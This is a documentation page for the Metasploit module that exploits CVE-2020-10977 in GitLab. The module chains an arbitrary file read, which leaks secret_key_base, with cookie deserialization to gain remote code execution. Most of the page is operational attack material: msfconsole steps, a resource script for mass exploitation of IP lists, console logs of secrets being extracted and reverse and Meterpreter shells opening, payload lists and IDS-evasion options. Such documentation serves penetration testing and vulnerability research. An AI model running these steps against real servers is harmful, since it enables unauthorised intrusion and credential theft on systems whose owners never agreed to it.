GitLab File Read Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/multi/http/gitlab_file_read_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: GitLab File Read Remote Code Execution
Module: exploit/multi/http/gitlab_file_read_rce
Source code: modules/exploits/multi/http/gitlab_file_read_rce.rb
Disclosure date: 2020-03-26
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): ruby
Supported platform(s): Ruby
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-10977
This module provides remote code execution against GitLab
Community Edition (CE) and Enterprise Edition (EE). It
combines an arbitrary file read to extract the Rails
"secret_key_base", and gains remote code execution with a
deserialization vulnerability of a signed
'experimentation_subject_id' cookie that GitLab uses
internally for A/B testing. Note that the arbitrary file
read exists in GitLab EE/CE 8.5 and later, and was fixed in
12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects
versions 12.4.0 and above when the vulnerable
experimentation_subject_id cookie was introduced. Tested
on GitLab 12.8.1 and 12.4.0.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
Using gitlab_file_read_rce against a single host
Normally, you can use exploit/multi/http/gitlab_file_read_rce this way:
msf > use exploit/multi/http/gitlab_file_read_rce
msf exploit(gitlab_file_read_rce) > show targets
... a list of targets ...
msf exploit(gitlab_file_read_rce) > set TARGET target-id
msf exploit(gitlab_file_read_rce) > show options
... show and set options ...
msf exploit(gitlab_file_read_rce) > exploit
Using gitlab_file_read_rce against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your gitlab_file_read_rce will be using:
- Do:
use exploit/multi/handler - Do:
set PAYLOAD [payload] - Set other options required by the payload
- Do:
set EXITONSESSION false - Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/http/gitlab_file_read_rce")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that Gitlab uses internally for A/B testing.
Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later,
and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects
versions 12.4.0 and above when the vulnerable experimentation_subject_id
cookie was introduced.
Tested on GitLab 12.8.1 and 12.4.0.
Setup
Running GitLab 12.8.1 with docker:
sudo docker run \
--rm \
--publish 443:443 --publish 80:80 --publish 22:22 \
--name gitlab \
gitlab/gitlab-ee:12.8.1-ee.0
The application will be available on port 80 or 443. This may take a long time.
Setting up SSL
This step is optional and only required if you wish to enable HTTPS for an arbitrary test URL such as gitlab.example.com
Connect to the running Gitlab instance:
sudo docker exec -it gitlab /bin/bash
Add these lines to /etc/gitlab/gitlab.rb:
external_url "https://gitlab.example.com"
letsencrypt['enable'] = false
Use OpenSSL to create a self signed certificate and key:
mkdir -p /etc/gitlab/ssl
chmod 755 /etc/gitlab/ssl
cd /etc/gitlab/ssl
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout gitlab.example.com.key -out gitlab.example.com.crt
Reconfigure GitLab:
gitlab-ctl reconfigure
On your host machine modify your /etc/hosts file:
127.0.0.1 gitlab.example.com
Visit the test URL in your browser and either ignore the certificate warnings or add it to continue:
https://gitlab.example.com/
Creating a user
You can either create a user account normally or programmatically as shown below.
Connect to the running Gitlab instance:
sudo docker exec -it gitlab /bin/bash
Open an interactive rails console:
gitlab-rails console -e production
Optional - Set the Gitlab root account credentials:
admin = User.where(id: 1).first
admin.update!(
password: 'password123',
password_confirmation: 'password123',
confirmation_token: nil,
confirmed_at: Time.now,
confirmation_sent_at: nil,
failed_attempts: 0
)
admin.skip_reconfirmation!
Create a normal user account:
user = User.new(
username: 'test',
name: 'test',
email: '[email protected]',
password: 'password123',
password_confirmation: 'password123',
confirmation_token: nil,
confirmed_at: Time.now,
confirmation_sent_at: nil,
failed_attempts: 0
)
user.save!
user.skip_confirmation!
Once finished, kill the running docker container with:
docker kill gitlab
Verification Steps
Check:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rceset RPORT <port>set RHOST <ip>set USERNAME [email protected]set PASSWORD password123check
[*] 10.10.10.111:9999 - The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
Run:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rceset RPORT <port>set RHOST <ip>set USERNAME [email protected]set PASSWORD password123set LPORT <port>set LHOST <ip>run- You should get a shell.
Specifying a SECRET_KEY_BASE to avoid the arbitrary file read:
- Run the application
- Start msfconsole
use exploit/multi/http/gitlab_file_read_rceset RPORT <port>set RHOST <ip>set SECRET_KEY_BASE 301ee96a664dc634b8766368d26b4ef4deb46c593490dc1f39526e0f278f2dfcb9f5c9bb13c74b5377848259a533c9ad137885c01a4387deb799e14589a6fbacset LPORT <port>set LHOST <ip>run- You should get a shell.
Scenarios
Arbitrary File Read to RCE
msf6 exploit(multi/http/gitlab_file_read_rce) > options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD password123 yes The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/ yes The path to the secrets.yml file
config/secrets.yml
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME [email protected] yes The username to authenticate as
VHOST gitlab.example.com no The virtual host name to use in requests
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST docker0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/gitlab_file_read_rce) > rerun
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user test
[*] Created project /test/pKUuduxC
[*] Created project /test/5W350yP1
[*] created issue /test/pKUuduxC/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20201121213408_default_127.0.0.1_gitlab.secrets_675303.txt'
[+] Extracted secret_key_base e41f3a01d22ff6a694be33bf2e5d40af89b788088938203c3478818da595731ada41c2b9c3d3caff79de7647a0c287bb68f6ca1912904a766237543013c46594
[*] Attempting to delete project /test/pKUuduxC
[*] Command shell session 23 opened (172.17.0.1:4444 -> 172.17.0.2:34058) at 2020-11-21 21:34:08 -0500
[*] Deleted project /test/pKUuduxC
[*] Attempting to delete project /test/5W350yP1
[*] Deleted project /test/5W350yP1
whoami
git
^Z
Background session 23? [y/N] y
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions -u 23
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [23]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 23
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.17.0.1:4433
[*] Sending stage (976712 bytes) to 172.17.0.2
[*] Meterpreter session 24 opened (172.17.0.1:4433 -> 172.17.0.2:45442) at 2020-11-21 21:34:34 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
23 shell ruby/ruby 172.17.0.1:4444 -> 172.17.0.2:34058 (127.0.0.1)
24 meterpreter x86/linux git @ 622b6a4c6722 (uid=998, gid=998, euid=998, egid=998) @ 17 172.17.0.1:4433 -> 172.17.0.2:45442 (172.17.0.2)
2.17.0.2
msf6 exploit(multi/http/gitlab_file_read_rce) >
Specifying SECRET_KEY_BASE to RCE
msf6 exploit(multi/http/gitlab_file_read_rce) > options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails yes The path to the secrets.yml file
/config/secrets.yml
SECRET_KEY_BASE 301ee96a664dc634b8766368d26b4ef4deb46c593 no The known secret_key_base from the secrets.yml - this skips the arbitrary f
490dc1f39526e0f278f2dfcb9f5c9bb13c74b5377 ile read if present
848259a533c9ad137885c01a4387deb799e14589a
6fbac
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME no The username to authenticate as
VHOST gitlab.example.com no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST docker0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/gitlab_file_read_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Command shell session 12 opened (172.17.0.1:4444 -> 172.17.0.2:58026) at 2020-12-06 19:53:24 -0500
^Z
Background session 12? [y/N] y
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions -u 12
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [12]
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 12
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.17.0.1:4433
[*] Sending stage (976712 bytes) to 172.17.0.2
[*] Meterpreter session 13 opened (172.17.0.1:4433 -> 172.17.0.2:56876) at 2020-12-06 19:53:42 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/http/gitlab_file_read_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
12 shell ruby/ruby 172.17.0.1:4444 -> 172.17.0.2:58026 (127.0.0.1)
13 meterpreter x86/linux git @ 5d733775a28a (uid=998, gid=998, euid=998, egid=998) @ 172 172.17.0.1:4433 -> 172.17.0.2:56876 (172.17.0.2)
.17.0.2
msf6 exploit(multi/http/gitlab_file_read_rce) >
Go back to menu.
Msfconsole Usage
Here is how the multi/http/gitlab_file_read_rce exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/gitlab_file_read_rce
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/gitlab_file_read_rce) > show info
Name: GitLab File Read Remote Code Execution
Module: exploit/multi/http/gitlab_file_read_rce
Platform: Ruby
Arch: ruby
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2020-03-26
Provided by:
William Bowling (vakzz)
alanfoster
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Payload information:
Description:
This module provides remote code execution against GitLab Community
Edition (CE) and Enterprise Edition (EE). It combines an arbitrary
file read to extract the Rails "secret_key_base", and gains remote
code execution with a deserialization vulnerability of a signed
'experimentation_subject_id' cookie that GitLab uses internally for
A/B testing. Note that the arbitrary file read exists in GitLab
EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8.
However, the RCE only affects versions 12.4.0 and above when the
vulnerable `experimentation_subject_id` cookie was introduced.
Tested on GitLab 12.8.1 and 12.4.0.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-10977
https://hackerone.com/reports/827052
https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/
Module Options
This is a complete list of options available in the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show advanced
Module advanced options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
KeyGeneratorIterations 1000 yes The key generator iterations
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SignedCookieSalt signed cookie yes The signed cookie salt
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/gitlab_file_read_rce module can exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/gitlab_file_read_rce exploit:
msf6 exploit(multi/http/gitlab_file_read_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
4 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
5 payload/ruby/pingback_bind_tcp normal No Ruby Pingback, Bind TCP
6 payload/ruby/pingback_reverse_tcp normal No Ruby Pingback, Reverse TCP
7 payload/ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP
8 payload/ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6
9 payload/ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP
10 payload/ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/gitlab_file_read_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/gitlab_file_read_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
GitLab <VERSION> is a vulnerable version.
Here is a relevant code snippet related to the "GitLab <VERSION> is a vulnerable version." error message:
458: version.between?(Rex::Version.new('12.4.0'), Rex::Version.new('12.7.7')) ||
459: version.between?(Rex::Version.new('12.8.0'), Rex::Version.new('12.8.7')) ||
460: version == Rex::Version.new('12.9.0')
461: )
462: if has_rce_present
463: return Exploit::CheckCode::Appears("GitLab #{version} is a vulnerable version.")
464: end
465:
466: Exploit::CheckCode::Safe("GitLab #{version} is not a vulnerable version.")
467: rescue GitLabClientException => e
468: Exploit::CheckCode::Unknown(e.message)
GitLab <VERSION> is not a vulnerable version.
Here is a relevant code snippet related to the "GitLab <VERSION> is not a vulnerable version." error message:
461: )
462: if has_rce_present
463: return Exploit::CheckCode::Appears("GitLab #{version} is a vulnerable version.")
464: end
465:
466: Exploit::CheckCode::Safe("GitLab #{version} is not a vulnerable version.")
467: rescue GitLabClientException => e
468: Exploit::CheckCode::Unknown(e.message)
469: end
470:
471: def validate_credentials_present!
Unable to successfully extract leaked secret_key_base value
Here is a relevant code snippet related to the "Unable to successfully extract leaked secret_key_base value" error message:
507: loot_path = store_loot('gitlab.secrets', 'text/plain', datastore['RHOST'], secrets_yml, 'secrets.yml')
508: print_good("File saved as: '#{loot_path}'")
509:
510: secret_key_base = secrets_yml[/secret_key_base:\s+(.*)/, 1]
511: if secret_key_base.nil?
512: fail_with(Failure::UnexpectedReply, 'Unable to successfully extract leaked secret_key_base value')
513: end
514:
515: print_good("Extracted secret_key_base #{secret_key_base}")
516: print_status('NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read')
517:
Failed to delete project <PATH>
Here is a relevant code snippet related to the "Failed to delete project <PATH>" error message:
524:
525: print_status("Attempting to delete project #{project['path']}")
526: git_lab_client.delete_project(project: project)
527: print_status("Deleted project #{project['path']}")
528: rescue StandardError
529: print_error("Failed to delete project #{project['path']}")
530: end
531: end
532:
533: def exploit
534: secret_key_base = read_secret_key_base
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_filemethod - #15540 Merged Pull Request: Add option for running
cmd_executein a subshell - #15303 Merged Pull Request: Fix
dirmethod for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- CVE-2020-10977
- https://hackerone.com/reports/827052
- https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/
See Also
Check also the following modules related to this module:
- exploit/multi/http/gitlab_exif_rce
- exploit/multi/http/gitlab_shell_exec
- auxiliary/scanner/http/gitlab_graphql_user_enum
- auxiliary/scanner/http/gitlab_login
- auxiliary/scanner/http/gitlab_user_enum
- exploit/multi/http/apache_jetspeed_file_upload
- exploit/multi/http/bolt_file_upload
- exploit/multi/http/clipbucket_fileupload_exec
- exploit/multi/http/coldfusion_ckeditor_file_upload
- exploit/multi/http/dotcms_file_upload_rce
- exploit/multi/http/eventlog_file_upload
- exploit/multi/http/horde_form_file_upload
- exploit/multi/http/hp_sitescope_uploadfileshandler
- exploit/multi/http/jboss_deploymentfilerepository
- exploit/multi/http/monstra_fileupload_exec
- exploit/multi/http/nibbleblog_file_upload
- exploit/multi/http/opmanager_socialit_file_upload
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/phpfilemanager_rce
- exploit/multi/http/playsms_filename_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/http/sit_file_upload
- exploit/multi/http/sysaid_auth_file_upload
- exploit/multi/http/sysaid_rdslogs_file_upload
- exploit/multi/http/uptime_file_upload_1
- exploit/multi/http/uptime_file_upload_2
- exploit/multi/http/webnms_file_upload
- exploit/multi/http/wp_dnd_mul_file_rce
- exploit/multi/http/wp_file_manager_rce
- exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- exploit/multi/http/wp_simple_file_list_rce
- exploit/multi/http/wso2_file_upload_rce
Related Nessus plugins:
Authors
- William Bowling (vakzz)
- alanfoster
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
